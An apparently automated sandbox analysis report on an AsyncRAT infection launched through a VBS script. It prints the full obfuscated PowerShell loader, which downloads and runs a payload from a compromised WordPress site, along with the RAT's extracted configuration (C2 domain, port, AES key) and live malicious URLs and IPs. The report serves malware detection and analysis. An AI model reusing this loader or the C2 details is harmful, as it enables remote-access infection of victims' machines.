                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\soste
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6644, TargetFilename: C:\Users\user\AppData\Local\Temp\xx1.ps1
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-26T10:57:03.426012+020020204231Exploit Kit Activity Detected91.202.233.16980192.168.2.549706TCP
                2024-09-26T10:57:24.904005+020020204231Exploit Kit Activity Detected91.202.233.16980192.168.2.549718TCP
                2024-09-26T10:58:04.651724+020020204231Exploit Kit Activity Detected91.202.233.16980192.168.2.549721TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-26T10:57:16.679373+020020348471Domain Observed Used for C2 Detected45.135.232.3835650192.168.2.549710TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-26T10:57:16.679373+020028424781Malware Command and Control Activity Detected45.135.232.3835650192.168.2.549710TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-26T10:57:02.264440+020028033053Unknown Traffic192.168.2.54970515.235.85.194443TCP
                2024-09-26T10:57:23.713260+020028033053Unknown Traffic192.168.2.54971715.235.85.194443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-26T10:57:16.679373+020028480481Domain Observed Used for C2 Detected45.135.232.3835650192.168.2.549710TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://www.informacionoportuna.com/wp-content/uploads/2024/Avira URL Cloud: Label: malware
                Source: https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txtAvira URL Cloud: Label: malware
                Source: https://www.informacionoportuna.com/wp-content/uploads/2024/09/dXAvira URL Cloud: Label: malware
                Source: HTTP://91.202.233.169/TAK/REG/MARZ/ENVS/DS1.TXTAvira URL Cloud: Label: malware
                Source: dcmxz.duckdns.orgAvira URL Cloud: Label: malware
                Source: https://www.informacionoportuna.com/wp-content/uploads/2024/09/pesky.txtAvira URL Cloud: Label: malware
                Source: 00000013.00000002.2417662894.00000240C11A1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: AsyncRAT {"Server": "dcmxz.duckdns.org", "Ports": "35650", "Version": "1.0.7", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "BMaxyTI6PFcknz46fW6SoamkbMkpDOBY", "Mutex": "DcRatMutex_qwqdanchun", "Certificate": "MIICMDCCAZmgAwIBAgIVAIhNlmebb6nSe6ECHjMpYKJ1i7gvMA0GCSqGSIb3DQEBDQUAMGQxFTATBgNVBAMMDERjUmF0IFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEcMBoGA1UECgwTRGNSYXQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIxMDEyODA1MzU1N1oXDTMxMTEwNzA1MzU1N1owEDEOMAwGA1UEAwwFRGNSYXQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALz18kcXxyYRNtzNciIOitqVEEKYOOJZOGjSaWOLKz3M/Df8QpKzt86Y+GK3639BYF/OzJ6i8PyJcI4jCe+L56ytnlJDfAYTzg7df+pvpE6bSgYYgBSEMcKBPrpx6bV5z/V8FOCVqlt9xfM47rHzIs6kOkc0Xu0TqFGxVfi3Koj/AgMBAAGjMjAwMB0GA1UdDgQWBBQOZShjgdZ92lUVGT5AalbF4rcBrDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBABuRWEmIgb/BjPElBrcq4LuUTHLBWgnJN3yXXtFA+Nl/+mYto5FZMUmzz3mbjKRHuzo79jdei4h1vSO9+2gTFWw1mY8HoeEoyL0YExBQMCoUPjpLJEuAydiWBMXXBmv0zPzE3W7zhG6DRe8pXQkZ2yu8c9G4KxXS1ITmSrlJqBQ6", "ServerSignature": "HHE5jOeVJOhAghvpojlJdIrDbFOsUbqwsp+EMG8VXpAUEeevWIZdvf0JXY09IqtRyF0X8OflaZjfz5GSeKAlhnZylZ4ewd/rQNkxEX2jmNQvqQm2VUSZ4DaZ1LNcyuuDLoLokVBSqAQ26qID63vTRTGCG+S4ivbzXv2B1m+Pq9M=", "BDOS": "null", "External_config_on_Pastebin": "false"}
                Source: sostener.vbsReversingLabs: Detection: 13%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.5:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.5:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.5:49719 version: TLS 1.2
                Source: Binary string: mscorlib.pdb source: powershell.exe, 00000007.00000002.2591558298.000001BCABC19000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32W source: powershell.exe, 00000007.00000002.2591558298.000001BCABC64000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ion.pdb source: powershell.exe, 00000007.00000002.2591558298.000001BCABC64000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: lib.pdb{@ source: powershell.exe, 00000007.00000002.2090443730.000001BC91BA8000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData

                Software Vulnerabilities

                barindex
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 45.135.232.38:35650 -> 192.168.2.5:49710
                Source: Network trafficSuricata IDS: 2034847 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT) : 45.135.232.38:35650 -> 192.168.2.5:49710
                Source: Network trafficSuricata IDS: 2848048 - Severity 1 - ETPRO MALWARE Observed Malicious SSL Cert (AsyncRAT) : 45.135.232.38:35650 -> 192.168.2.5:49710
                Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 91.202.233.169:80 -> 192.168.2.5:49706
                Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 91.202.233.169:80 -> 192.168.2.5:49718
                Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 91.202.233.169:80 -> 192.168.2.5:49721
                Source: Malware configuration extractorURLs: dcmxz.duckdns.org
                Source: unknownDNS query: name: dcmxz.duckdns.org
                Source: Yara matchFile source: 4.2.powershell.exe.155dc4f0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.powershell.exe.240c0f59258.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.155c408daf0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.powershell.exe.1c03c941ab0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.155c5369780.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2534304751.00000155DC4F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 45.135.232.38:35650
                Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/dllskyfal.txt HTTP/1.1Host: www.informacionoportuna.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/pesky.txt HTTP/1.1Host: www.informacionoportuna.com
                Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/dllskyfal.txt HTTP/1.1Host: www.informacionoportuna.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/pesky.txt HTTP/1.1Host: www.informacionoportuna.com
                Source: global trafficHTTP traffic detected: GET /Tak/Reg/Marz/ENVS/DS1.txt HTTP/1.1Host: 91.202.233.169Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /Tak/Reg/Marz/ENVS/DS1.txt HTTP/1.1Host: 91.202.233.169Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /Tak/Reg/Marz/ENVS/DS1.txt HTTP/1.1Host: 91.202.233.169Connection: Keep-Alive
                Source: Joe Sandbox ViewASN Name: M247GB M247GB
                Source: Joe Sandbox ViewASN Name: HP-INTERNET-ASUS HP-INTERNET-ASUS
                Source: Joe Sandbox ViewASN Name: ASBAXETNRU ASBAXETNRU
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49705 -> 15.235.85.194:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49717 -> 15.235.85.194:443
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.169
                Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/dllskyfal.txt HTTP/1.1Host: www.informacionoportuna.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/pesky.txt HTTP/1.1Host: www.informacionoportuna.com
                Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/dllskyfal.txt HTTP/1.1Host: www.informacionoportuna.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/pesky.txt HTTP/1.1Host: www.informacionoportuna.com
                Source: global trafficHTTP traffic detected: GET /Tak/Reg/Marz/ENVS/DS1.txt HTTP/1.1Host: 91.202.233.169Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /Tak/Reg/Marz/ENVS/DS1.txt HTTP/1.1Host: 91.202.233.169Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /Tak/Reg/Marz/ENVS/DS1.txt HTTP/1.1Host: 91.202.233.169Connection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: www.informacionoportuna.com
                Source: global trafficDNS traffic detected: DNS query: dcmxz.duckdns.org
                Source: powershell.exe, 00000004.00000002.2090885360.00000155C419D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2090885360.00000155C5553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C1151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03CAF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP://91.202.233.169/TAK/REG/MARZ/ENVS/DS1.TXT
                Source: powershell.exe, 00000004.00000002.2090885360.00000155C5553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C1151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03CAF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.169
                Source: powershell.exe, 00000004.00000002.2090885360.00000155C419D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2090885360.00000155C5553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C1151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03CAF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.169/Tak/Reg/Marz/ENVS/DS1.txt
                Source: powershell.exe, 00000004.00000002.2090885360.00000155C5553000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.169/Tak/Reg/Marz/Ex
                Source: powershell.exe, 00000004.00000002.2090885360.00000155C419D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.1692
                Source: powershell.exe, 00000004.00000002.2090885360.00000155C5553000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.202.HX
                Source: powershell.exe, 00000014.00000002.3008770894.0000013DBA5E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                Source: powershell.exe, 00000004.00000002.2090885360.00000155C52A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C0E94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C877000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://informacionoportuna.com
                Source: powershell.exe, 00000004.00000002.2351244189.00000155D3D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2090885360.00000155C5662000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2089840253.0000027FDD117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2257316904.0000027FEBA14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2257316904.0000027FEB8DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2475466595.000001BCA3A64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2094729613.000001BC95166000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2475466595.000001BCA392E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2137458295.000001355E2BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3182605416.000001356CB84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3182605416.000001356CA4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000009.00000002.2137458295.000001355E264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000021.00000002.3715892947.000001C054380000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C88A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.3715892947.000001C0543BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C877000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0=
                Source: powershell.exe, 00000021.00000002.3715892947.000001C054380000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C88A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.3715892947.000001C0543BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C877000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                Source: powershell.exe, 00000001.00000002.2712472865.000001571318C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2090885360.00000155C3C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2089840253.0000027FDB861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2094729613.000001BC938C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2137458295.000001355C9D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C0423000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3100761973.0000013DBC25B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2404669960.0000020A17317000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2402946494.0000021F8648A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2400633060.000001E1272DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03BE16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2808818768.000001C60C1E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2807757443.000001CFC056A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000013.00000002.2411972909.00000240C032A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wicroft.com
                Source: powershell.exe, 00000006.00000002.2089840253.0000027FDCCBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2094729613.000001BC95067000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2137458295.000001355DEC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: powershell.exe, 00000009.00000002.2137458295.000001355E264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000004.00000002.2090885360.00000155C52A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C0E94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C877000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.informacionoportuna.com
                Source: powershell.exe, 00000021.00000002.3715892947.000001C054380000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2742802158.000001C03A2BE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C877000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: powershell.exe, 00000021.00000002.3715892947.000001C054380000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2742802158.000001C03A2BE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03C877000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: powershell.exe, 00000001.00000002.2712472865.0000015713145000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3100761973.0000013DBC208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                Source: powershell.exe, 00000001.00000002.2712472865.000001571315A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2090885360.00000155C3C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2089840253.0000027FDB861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2094729613.000001BC938C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2137458295.000001355C9D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C0439000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C044C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3100761973.0000013DBC230000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2404669960.0000020A172F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2404669960.0000020A172DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2402946494.0000021F863E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2402946494.0000021F863C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2400633060.000001E127284000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2400633060.000001E12729D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03BE2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03BE18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2808818768.000001C60C1A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2808818768.000001C60C1B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2807757443.000001CFC052D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2807757443.000001CFC051F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2814694674.000002CE3076E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000009.00000002.3182605416.000001356CA4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000009.00000002.3182605416.000001356CA4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
